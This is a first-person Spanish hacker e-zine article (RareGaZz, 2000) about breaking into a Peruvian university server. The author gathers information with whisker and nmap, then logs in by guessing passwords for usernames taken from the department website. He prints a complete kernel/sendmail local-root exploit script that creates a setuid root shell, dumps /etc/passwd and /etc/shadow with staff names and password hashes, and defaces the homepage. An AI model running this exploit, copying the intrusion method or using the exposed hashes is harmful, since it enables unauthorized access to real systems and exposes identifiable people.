RareGaZz17:(r17_08):30/11/2000 << Back To RareGaZz17


+------+-------------------------------------------+----------+--------------+ | +-->| Un Root mas... que importa! |<---------| ReYDeS | +->|<--> r17_08 <-+-----------+-----+--------->+--------------+----------->|-+ +-------------------------------------------------------------------------- [ReYDeS@127.0.0.1]$ cat indice.tmp | <---+--+ 1. Pre-historia 2. Historia 2.1 Recabando Informacion 2.2 Ingresando 2.3 Tratando 2.4 El fallo 2.4.1 Discusion 2.4.2 Exploit 2.4.3 Solucion 2.4.4 Creditos 2.5 Lo alcanzable 3. Post-historia 4. El presente <---+--+ | El presente escrito narra la triste historia de un peque~o ni~o; que no tuvo mejor cosa que hacer un dia; que ingresar a un servidor con el solo proposito de probarse a si mismo que podia hacerlo. Patetico!... pues ese ni~o, era yo! :D | <------------------+ | 1) Pre-historia: | +-------------------> | Nada que ver con australopitecus australianus, ni ningun otro antepasado nuestro. Un dia cuya fecha no recuerdo; al ingresar a mi centro de estudios superiores, me topo con un anuncio que publicitaba un simposium o conferencia sobre algo relacionado a matematicas y computadores. Lo que siempre me llama la atencion de estos carteles es cuando colocan su e-mail o url; cuando son propios claro; nada de hot-latin-mix, y demas mails. | <------------------+ | 2) Historia: | +-------------------> | Estando en el lugar acostumbrado desde el cual se han perpetrado acciones nada sacras, recorde dicho anuncio. Asi es que despues de estar durante un buen rato Web-Eando en la red. Decidi tomarme un break y hacer algo, (adivinen que?). Recorde la direccion de correo que habia visto en el cartel, era conocida para mi; asi es que haciendo a un lado la arroba y mis malas intenciones, decidi (notaron que dije decidi?), decidi; ingresar a dicho servidor por puro amor propio (que falto de amor estoy!). Revoloteaba en mi mente la idea de cambiarle la web page en la cual publicitaban dicha conferencia y colocar alli algo inusual, como "Salven a las ballenas Azules!" o "Salven a las mujeres virgenes!". Que forma de j*der la vida de los demas, verdad?. :) 2.1) Recabando informacion: Visito su Pagina Web; me topo con una simple page con frames, nada espectacular como con flash. Visito algunos enlaces interesantes, como el de los usuarios, la mayoria son de profesores y casi todos tienen e-mail; sigo recorriendo, nada de cgi's, ni nada de eso. Finger!... (un finger externo; solo) Hmmm!... porque sera que siempre que hago estas cosas, no hay nadie visiblemente logeado?. Suerte?. :O Le voy a pasar algunas tools para examinar este server; empiezo con el Whisker. Que me decis?, que no saben lo que es el whisker? pues siento deciros que yo tampoco :P. - whisker / v1.2.0 / rain.forest.puppy / ADM / wiretrip -- - Using IDS spoofing...= - = - = - = - = - = = Host: www.htam.urtinu.edu.pe (virtual host)= Netcraft OS: Linux = Netcraft OS: Linux= Server: Apache/1.3.9 (Unix) (Red Hat/Linux) Content-type: text/html Deduzco entonces, que es un Linux 6.1. Que como lo se?; pues, esto se sabe consultando con una pitonisa o examinado su proceso de LogIn, el cual muestra esa info aparentemente inofensiva. Un punto menos para Uds. :) Agregar para los despitados, que el whisker posibilita el escaneo de vulnerabilidades conocidas; a mi no me saco ninguna. Seguimos recabando info. Es el turno ahora de ver los puertos que tiene activo este server; les presento al Se~or nmap, seguro que ya lo conocereis. Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ ) Machine 161.13*.***.*** MIGHT actually be listening on probe port 80 Host htam.urtinu.edu.pe (161.13*.***.***) appears to be up ... good. Initiating TCP connect() scan against htam.urtinu.edu.pe (161.13*.***.***) Adding TCP port 1517 (state open). Adding TCP port 143 (state open). Adding TCP port 1510 (state open). Adding TCP port 1519 (state open). Adding TCP port 23 (state open). Adding TCP port 1521 (state open). Adding TCP port 79 (state open). Adding TCP port 514 (state open). Adding TCP port 111 (state open). Adding TCP port 1508 (state open). Adding TCP port 515 (state open). Adding TCP port 6000 (state open). Adding TCP port 110 (state open). Adding TCP port 109 (state open). Adding TCP port 1516 (state open). Adding TCP port 513 (state open). Adding TCP port 1520 (state open). Adding TCP port 21 (state open). Adding TCP port 25 (state open). Adding TCP port 98 (state open). Adding TCP port 113 (state open). Adding TCP port 80 (state open). Adding TCP port 1518 (state open). The TCP connect scan took 84 seconds to scan 1523 ports. Interesting ports on htam.urtinu.edu.pe (161.13*.***.***): (The 1500 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 79/tcp open finger 80/tcp open http 98/tcp open linuxconf 109/tcp open pop-2 110/tcp open pop-3 111/tcp open sunrpc 113/tcp open auth 143/tcp open imap2 513/tcp open login 514/tcp open shell 515/tcp open printer 1508/tcp open diagmond 1510/tcp open mvx-lm 1516/tcp open vpad 1517/tcp open vpac 1518/tcp open vpvd 1519/tcp open vpvc 1520/tcp open atm-zip-office 1521/tcp open ncube-lm 6000/tcp open X11 Nmap run completed -- 1 IP address (1 host up) scanned in 91 seconds Opps!... Aqui hay mas puertos abiertos que en todas las playas del Peru!. Miren!... por alli esta el Callao! :) A primera vista, puedo inferir que no les interesa un pepino su seguridad; je!... que colera verdad?... :D. Que creen acaso?, que con instalar la version mas reciente, es suficiente?. Se merecen todo lo que les ocurra. Es casi un protocolo hacer todo lo anterior, pues por alli te puedes ahorrar mucho tiempo si encuentras una vulnerabilidad conocida, mediante una tool que haga esto por ti. A esto le llamo; "Hack a la carta", que mas se puede pedir?... Si, tal vez un programa que haga todo el proceso y de el prompt del root... :DDD. Macabro!. 2.2) Ingresando: Despues de todo lo anterior, pues es hora de que aparezca la mujer barbuda :), es momento de ingresar; pero... Como diantres ingreso?. Alli esta el detalle. Podria buscarme por alli un exploit que me permita el ingreso y tal vez un root remoto. Pero porque complicarse las cosas?. Es mejor empezar por lo mas facil; y lo mas facil es...?. Exacto; Login=Password!... Tipico, un clasico del hack, tan clasico como una melodia de Beethoven. De donde saco los logins?, del finger?... puede ser; pero prefiero algo mas visual :P. Me acorde de que en su Web hay listados algunos e-mails. Pues bien, esa en apariencia, inofensiva informacion, sera su talon de aquiles. Trying 161.1**.***.***... Connected to htam.urtinu.edu.pe. Escape character is '^]'. Red Hat Linux release 6.1 (Cartman) Kernel 2.2.12-20 on an i686 login: ReYDeS Password: ****** Last login: Sat Jul 15 09:19:42 from localhost [ReYDeS@htam]$ Resulta innecesario aclarar que el login es ficticio :P, y que el ingreso no se produjo en el primer intento; y de que tuve mucha suerte, pues si!... Claro, que no hubiese hecho esto manualmente si fuesen 2500 cuentas, ademas, el tremendo log que dejo!, eso si no impiden el logeo a mi IP. Pero no creo que tengan esas politicas de seguridad. Ellos estan el otra, estan tratando de hallar "la cuadratura del circulo". :D Y ahora me pregunto. Para que diantres me puse a hacer todo lo anterior, pudiendo ingresar de la forma mas estupida?... :-O Pero nunca esa informacion esta de mas, me hubiese tenido que tragar lo dicho, si no me hubiese funcionado lo anterior y tener que liarme con demonios, versiones vulnerables, y puertos abiertos. Ademas, siempre lo mas facil es ingresar al servidor, el reto empieza cuando se desea alcanzar "lo prohibido"; sin ser atrapado en el intento, claro. 2.3) Tratando: Entonces... ya estoy comodamente instalado en su server, pues bien; lo que quiero hacer el pillar el root y cambiarle la web, verdad?... Que horror! como es que puedo estar haciendo esto?, y pensar que me habia retirado, jeje! esto se consideraria un crack!, pero no os voy a hacer filosofar ahora. [ReYDeS@htam]$ finger 9:02am up 1 day, 22:34, 1 user, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ReYDeS pts/0 localhost 9:02am 0.00s 0.11s 0.01s no_se! Me pregunto. Que estara haciendo este server?... veamos... [ReYDeS@htam]$ ps ax PID TTY STAT TIME COMMAND 1 ? S 0:04 init [3] 2 ? SW 0:07 [kflushd] 3 ? SW 0:02 [kupdate] 4 ? SW 0:00 [kpiod] 5 ? SW 0:05 [kswapd] 6 ? SW< 0:00 [mdrecoveryd] 300 ? S 0:00 portmap 316 ? SW 0:00 [apmd] 369 ? S 0:02 syslogd -m 0 380 ? S 0:00 klogd 396 ? S 0:00 /usr/sbin/atd 412 ? S 0:00 crond 432 ? S 0:00 inetd 448 ? SW 0:00 [lpd] 477 ? S 0:00 sendmail: accepting connections on port 25 494 ttyS0 S 0:00 gpm -t ms 510 ? S 0:00 httpd 535 ? S 0:01 xfs -droppriv -daemon -port -1 575 tty2 SW 0:00 [mingetty] 576 tty3 SW 0:00 [mingetty] 578 tty5 SW 0:00 [mingetty] 579 tty6 SW 0:00 [mingetty] 4820 tty1 S 0:00 /sbin/mingetty tty1 5756 tty4 S 0:00 /sbin/mingetty tty4 6376 ? S 0:00 httpd 6377 ? S 0:00 httpd 6378 ? S 0:00 httpd 6379 ? S 0:00 httpd 6380 ? S 0:00 httpd 6381 ? S 0:00 httpd 6382 ? S 0:00 httpd 6383 ? S 0:00 httpd 6998 ? S 0:00 in.telnetd 6999 pts/0 S 0:00 login -- unknow 7001 pts/0 S 0:00 -bash 7034 pts/0 T 0:00 unknow 7062 pts/0 R 0:00 ps ax Excepto por un par de procesos; pareciera que estoy en mi 8086. Asi es que me siento como en casa. Es momento de ascender mis privilegios.. como?. Se me ocurre revisar las versiones, por ejemplo el ftp, sendmail, bind... hmmm!!!, no se. :P. Mientras reviso; paralelamente doy una visita a bugtraq y packetstorm; hallo cosas verdaderamente interesantes... Parece ser que un 90% tuviese algun tipo de vulnerabilidad debidamente documentada. Me llama la atencion una combinacion de kernel con sendmail, que permite conseguir un root local. Reviso mi kernel... (notaron que dije MI kernel?, mucha confianza!.) [ReYDeS@htam]$ [ReYDeS@htam]$ uname -a Linux htam 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown Uh!!!... la primera parte esta bien, version 2.2.12-20. Ahora deseo ver la version del sendmail... [ReYDeS@htam]$ telnet localhost 25 Trying 161.132.*.*... Connected to htam.urtinu.edu.pe. Escape character is '^]'. 220 localhost.localdomain ESMTP Sendmail 8.9.3/8.9.3; Wed, 20 Ago 2002 16:17:38 -0500 Caspita!!!... version 8.9.3/8.9.3!!!!, extra-ordinario!... se nota mi emocion??? :D, en teoria seria posible mediante este fallo alcanzar root; pues los requisitos para explotarlo se cumplen. Premisa verdadera. 2.4) El Fallo: Es bueno un poco de cultura al respecto. Y no ir por alli ejecutandose un exploit, sin tomarse la molestia de averiguar de que se trata este rollo. Que me dice bugtraq al respecto?... 2.4.1) Discusion: (No me gusta discutir) POSIX "Capabilities" han sido recientemente implementados en el Kernel del Linux. "Capabilities" son una forma adicional de control de privilegios para permitir un control mas especifico sobre lo que los procesos privilegiados puedan hacer. Capabilities estan implementados en 3 campos de bits, cada bit representa una accion especifica que un proceso privilegiado puede realizar. Seteando bits especificos, la accion de procesos privilegiados puede ser controlado. Esto es una medida de seguridad. El problema es que "capabilities" son copiados con ejecuciones fork(), significando que si "capabilities" son modificados por un proceso padre, ello puede ser sobre acarreado. La forma en que esto puede ser explotado es seteando todos los "capabilities" a cero (todos los bits a off) en cada uno de los 3 campos de bit y entonces ejecutar un programa setuid que intente dejar privilegios antes de ejecutar codigo que puede ser peligroso si corre como root, como es que el sendmail lo hace. Cuando el sendmail intenta dejar priviliegios usando setuid(getuid()), este falla no teniendo las "capabilities" requeridas para hacerlo en los campos de bits. Este continua ejecutandose con privilegios de superusuario, y puede correr un archivo .forward de un usuario como root, conllevando a un compromiso completo. Procmail puede ser explotado de esta manera. 2.4.2) Exploit: ]:) A continuacion el exploit. Aunque muchos de vosotros, creo que ya debeis de haberle dado un vistaso; bueno, para los que ni se enteraron. Aqui esta. <++> ker-send.sh #!/bin/sh echo "+-----------------------------------------------------------+" echo "| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |" echo "| local root exploit |" echo "| |" echo "| Bugs found and exploit written by Wojciech Purczynski |" echo "| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |" echo "+-----------------------------------------------------------+" TMPDIR=/tmp/foo SUIDSHELL=/tmp/sush SHELL=/bin/tcsh umask 022 echo "Creating temporary directory" mkdir -p $TMPDIR cd $TMPDIR echo "Creating anti-noexec library (capdrop.c)" cat <<_FOE_ > capdrop.c #define __KERNEL__ #include <linux/capability.h> #undef __KERNEL__ #include <linux/unistd.h> _syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data) extern int capset(cap_user_header_t header, cap_user_data_t data); void unsetenv(const char*); void _init(void) { struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0}; struct __user_cap_data_struct capd={0, 0, 0xfffffe7f}; unsetenv("LD_PRELOAD"); capset(&caph, &capd); system("echo|/usr/sbin/sendmail -C$TMPDIR/sm.cf $USER"); } _FOE_ echo "Compiling anti-noexec library (capdrop.so)" cc capdrop.c -c -o capdrop.o ld -shared capdrop.o -o capdrop.so echo "Creating suid shell (sush.c)" cat <<_FOE_ > sush.c #include <unistd.h> int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); } _FOE_ echo "Compiling suid shell (sush.c)" cc sush.c -o $TMPDIR/sush echo "Creating shell script" cat <<_FOE_ >script mv $TMPDIR/sush $SUIDSHELL chown root.root $SUIDSHELL chmod 4111 $SUIDSHELL exit 0 _FOE_ echo "Creating own sm.cf" cat <<_FOE_ >$TMPDIR/sm.cf O QueueDirectory=$TMPDIR O ForwardPath=/no_forward_file S0 R\$* \$#local \$: \$1 Mlocal, P=$SHELL, F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, T=DNS/RFC822/X-Unix, A=$SHELL $TMPDIR/script _FOE_ echo "Dropping CAP_SETUID and calling sendmail" export LD_PRELOAD=$TMPDIR/capdrop.so /bin/true unset LD_PRELOAD echo "Waiting for suid shell ($SUIDSHELL)" while [ ! -f $SUIDSHELL ]; do sleep 1; done echo "Removing everything" cd .. rm -fr $TMPDIR echo "Suid shell at $SUIDSHELL" $SUIDSHELL <--> 2.4.3) Solucion: Aconsejaba en aquel entonces bugtraq, la pronta actualizacion a una version superior al kernel 2.2.16pre6 con el patch correspondiente. De igual manera, las diferentes distribuidores de Linux publicarion advisories y patchs en sus respectivos sites. 2.4.4) Creditos: Es obvio que no a mi! :D; yo solo comprobe este exploit para fines puramente educativos :) (que mentira!) :D Discovered by Wojciech Purczynski <wp@elzabsoft.pl>. 2.5) Lo Alcanzable: Luego de habernos documentado fervientemente al respecto, y saber cual es el tema de esta cancion, solo resta probar dicho exploit y cruzar los dedos del pie esperando un comodo shell con privilegios de root. [ReYDeS@htam]$ ./sush ; echo "jeje!" [ReYDeS@htam]# jeje! Notaron el cambio?... '$' por '#'... Interesante verdad?. :) [ReYDeS@htam]$ whoami root Habiendo obtenido los maximos privilegios posibles, lo que pueda realizar con este servidor solamente sera limitado por mi moral... cual???. Mi intencion es la cambiarle la web; pero antes de ello, no resisto la tentacion de visualizar el 'passwd'. He aqui un recorte, para no aburriros. [ReYDeS@htam]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false postgres:x:40:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash elmer:x:500:0:Elmer Guarniz Guarniz:/home/elmer:/bin/bash soporte:x:501:0:Soporte del Servidor Math:/home/soporte:/bin/bash rprada:x:503:0:Robert Prada Marchena (Soporte):/home/rprada:/bin/bash jsanchez:x:504:0:Armando Sanchez Ll. Rosales:/home/jsanchez:/bin/bash orlando:x:505:10:Orlando M. Hernandez Bracamonte:/home/orlando:/bin/bash jperal:x:506:0:Julio Cesar Peralta C.:/home/jperal:/bin/bash ... etc, etc... Seguimos con el file 'shadow': [ReYDeS@htam]# cat /etc/shadow root:$1$gLRC2Xxt$Ra6iee0ep3RaoV.9HQm4K0:11066:0:99999:7:-1:-1:134549460 bin:*:11061:0:99999:7::: daemon:*:11061:0:99999:7::: adm:*:11061:0:99999:7::: sync:*:11061:0:99999:7::: shutdown:*:11061:0:99999:7::: halt:*:11061:0:99999:7::: mail:*:11061:0:99999:7::: news:*:11061:0:99999:7::: uucp:*:11061:0:99999:7::: operator:*:11061:0:99999:7::: games:*:11061:0:99999:7::: gopher:*:11061:0:99999:7::: ftp:*:11061:0:99999:7::: nobody:*:11061:0:99999:7::: xfs:!!:11061:0:99999:7::: postgres:!!:11061:0:99999:7::: elmer:$1$bKWZjl8W$K3et6Yde42c61tS34yA19/:11062::99999::::135538028 soporte:$1$5r7pAOGi$aKJ3a0WgUJOVmcrCKXMPe1:11127:-1:99999:-1:-1:-1:134550572 rprada:$1$VEHyS1Fd$c.6lHxGyxrtfpKH98CLht0:11062:-1:99999:-1:-1:-1:135526316 jsanchez:$1$kEOhAX9K$DPdAdzRxBvXDEmXgkPHlr/:11062:-1:99999:-1:-1:-1:135535564 orlando:$1$Zsa0V0eh$P9E8ybN2qKt1Wpgc0VOyc/:11062::99999::::135528828 jperal:$1$b3gqV6mO$Y8Wh6qg1E3rz08MRUkpH..:11127:-1:99999:-1:-1:-1:134550572 ... y etc, etc... Hay muchisimas mas cuentas, pero para que desperdiciar espacio en este escrito?. Ahora sin ningun desparpajo ni limitaciones voy a navegar por los diferentes directorios y revisar algunos archivos. Luego de un momento llego a este directorio: [ReYDeS@htam]# [ReYDeS@htam]# ls -al htt* total 12 drwxr-xr-x 2 root root 4096 Dec 17 1999 cgi-bin drwxr-xr-x 6 root root 4096 Jul 14 13:05 html drwxr-xr-x 3 root root 4096 Apr 14 11:01 icons [ReYDeS@htam]# cd http/html [ReYDeS@htam]# ls BACK.jpg cursosold.html greenball.gif mains.html Fundo14.jpg dpto.html hotele.html manual Peru1.gif esc-unt.gif hotels.html mathlinks.html SPMAC escudo.jpg index.html op-esp.html adm.html escuela.html lista.html op-ing.html bienvenida.html eventos logopan1.GIF original construction.gif eventos.html maestria.html post_mat.html curso-op.html ficha.doc maestriaold.html rockfon.jpg cursos.html flag_uk.gif maine.html Ahora un backup, antes de j*oderla. Mas vale prevenir que lamentar :) [ReYDeS@htam]# cp index.html index.cp [ReYDeS@htam]# emacs index.html Luego; entre <html> y < /html> coloco un texto; fruto de la inspiracion instantanea e iluminacion acustica ambiental... :-? ( tengo que dejar los estimulantes neuronales, antes de escribir estos textos :D ). El texto?, lo siguiente; favor abstenerse de insultos. <BLOCKQUOTE> <P ALIGN="justify"> Esta pagina ha sido modificada, para manifestar de una manera visual, la falta de SEGURIDAD en el servidor HTAM.*****.EDU.PE. El fallo que se ha explotado para alcanzar los maximos privilegios o el comunmente denominado "ROOT", sera reportado en su debido momento. Para un conocedor de lo esencial en seguridad sera facil dar con el fallo. </BLOCKAUOTE> <BLOCKQUOTE> <P ALIGN="justify"> Ningun acto "da~ino" ha sido perpetrado contra este servidor, los archivos manipulados han sido copiados, antes de ser modificados. Ningun archivo ha sido borrado, ni la privacidad de los correos personales ha sido violado; de igual forma ningun password ha sido cambiado. </BLOCKQUOTE> <BR><BR><BR> <BLOCKQUOTE> <P ALGIN="justify"> Pagina modificada el 15 de Julio del a~o 2000. </BLOCKQUOTE> <BR><BR> <P ALGIN="center"> Cualquier contrato; a mi e-mail: ReYDeS@******.*** Ni yo creo lo que escribi en ese momento!... Pero ahora que lo medito con mas calma: Que estupido!!!; es bueno reconocer lo errores, y sin son propios, mejor aun :D. Ahora he cambiado de controladores para mi dispositivo neuronal :-P Modificada!... se podria decir mision cumplida?, pues para una situacion producto del momento, ha sido interesante. | <------------------+ | 3) Post Historia: | +-------------------> | Solo resta deciros lo que ocurrio despues, a modo de outro de este escrito. Esta intromision ocupa la pagina de informatica de un diario de mi ciudad, en el cual se informaba de una manera neutral, sin exageraciones ni sensacionalismo, lo acaecido al respecto. Debo decir que se pusieron en contacto con este servidor (yo), antes de que esto saliese publicado en su diario. Cuando lei la noticia, hubo una mezcla de culpa y alegria pues pareciera ser que fue el primer hecho, documentado sobre un acto de este tipo. Luego de esta 'travesura', me tranquilize y prometi no volver a tocar este server; seria como volver con la misma novia, despues de haber terminado. Aunque pensAndolo bien!... :). Es mejor que deje de hacer estas cosas de imprevisto; asi es que voy a estudiar. Por alli habia otro servidor que estaba en mi campo visual, y es el que esta en la jerarquia superior a este. Pero lastimosamente dicho servidor esta en fase de transicion, ya que ahora trabajara bajo una coneccion de; adivinen quien?... | <------------------+ | 4) El presente: | +-------------------> | Espero que hayais pasado un momento instructivo y entretenido leyendo este escrito; ya se que para los gurus, esto les importara un ribosoma, pero a modo entretener y educar; cosa dificil en esta epoca; se que he aportado a la sinapsis de vuestras neuronas. Deciros ademas que; acciones como las que narro en mis escritos para esta edicion de RareGaZz; ocurren a cada momento en cualquier parte del mundo. Por lo percibido en mi entorno mas cercano; os puedo decir con mucha 'seguridad'; que la mayoria de los servidores con los cuales he tenido alguna relacion, tiene alguna vulnerabilidad conocida. Pero aun asi, no toman en serio su seguridad, sino hasta que ocurren situaciones como las aqui narradas o mucho peores. Un consejo hasta de un cangrejo. Piensen bien las cosas antes de hacerlas; el hecho de que yo no lo haga, no es excusa!. :D Tengan cuidado alli afuera. Internet es una jungla. Y con esta nos vamos... " Si al ver lo que eras hace algun tiempo, te sientes estupido; estupido, es se~al de que has mejorado!. " y.o Yo me despido hasta otra proxima oportunidad. (c) ReYDeS, un mes del a~o 2000, en alguna ciudad del Peru. ReYDeS@fnmail.com - RareGaZz Team.